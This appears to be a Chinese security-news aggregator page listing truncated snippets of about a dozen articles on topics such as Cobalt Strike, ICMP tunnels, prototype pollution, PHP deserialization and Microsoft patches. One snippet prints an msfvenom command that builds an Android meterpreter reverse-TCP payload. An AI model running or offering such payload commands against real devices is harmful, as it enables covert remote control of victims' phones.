作者:匿名黑客 e编辑:李普君漏洞作者:路人甲相关厂商:新浪微博漏洞编号:Wooyun-2014-059455事情是这样的互联网这两天出了个不大不小的漏洞,我把他叫 「OAuth 回调污染」。OAut...
工具的使用 | CobaltStrike的使用
CobaltStrike的使用目录CobaltStrikeCobaltStrike的安装CobaltStrike的使用创建监听器:创建Attacks:视图View:对被控主机的操作抓取hash和dum...
内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)目录 ICMP隧道 &...
Javascript原型链攻击与防御
“ NaN!=NaN”在讲这个漏洞之前我们来理解一下Javascript。与其他的语言不同的是,Js在Es6之前是没有class的,他更多的是一个原型语言,在Js里有一句话很有名——"一切皆对象"01...
关于packetbeat实战那些事儿
一概述目前,在企业的安全建设过程中,流量的作用越来越大,我们可以利用流量去做很多的事,比如资产收集、攻击发现、数据分析等等,而使用流量的第一道关口就是流量解析,将网络层的流量解析为可读的文本数据,pa...
【浅论审查证据材料的必要性程度】
对案件中的重要证据材料进行甄别、审查,是现代司法裁判者的一项重要工作内容。为何要加上“现代”二字,是因为我国古代行政与司法高度一体,审判官事实上将公安机关的侦查职能、检察机关的公诉职能、法院的审判职能...
PHP反序列化字符逃逸详解
原创稿件征集邮箱:[email protected]:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的稿酬PHP反...
数据安全:数据安全能力成熟度模型
万事万物谈及安全,理应都是全生命周期性的安全,数据安全自然也要考量其全生命周期,数据安全要从数据采集安全、数据传输安全、数据存储安全、数据处理安全、数据交换安全、数据销毁安全、通用安全等维度进行要求。...
利用msf框架对安卓手机进行简单操作
测试机型红米k30 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > vir...
巧用APP历史版本对APP登录signature分析
前言 之前在火线zone看到利用app历史版本来进行app的逆向分析,可以降低一下分析难度,比较老版本的安全防护做的不是很到位。正好最近有一个app,尝试利用一下老版本进行分析登录签名,没想到效果非常...
发布 | 工信部印发《关于加强智能网联汽车生产企业及产品准入管理的意见》
扫码订阅《中国信息安全》杂志权威刊物 重要平台 关键渠道邮发代号 2-786工业和信息化部关于加强智能网联汽车生产企业及产品准入管理的意见工信部通装〔2021〕103号各省、自治区、直辖市及新疆生产建...
微软8月补丁星期二值得关注的几个0day、几个严重漏洞及其它
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今天,微软发布8月补丁星期二,共修复了44个漏洞,其中7个被评级为“严重”级别,3个是0day 且其中1个已遭利用。受影响工具其中13个补...
27768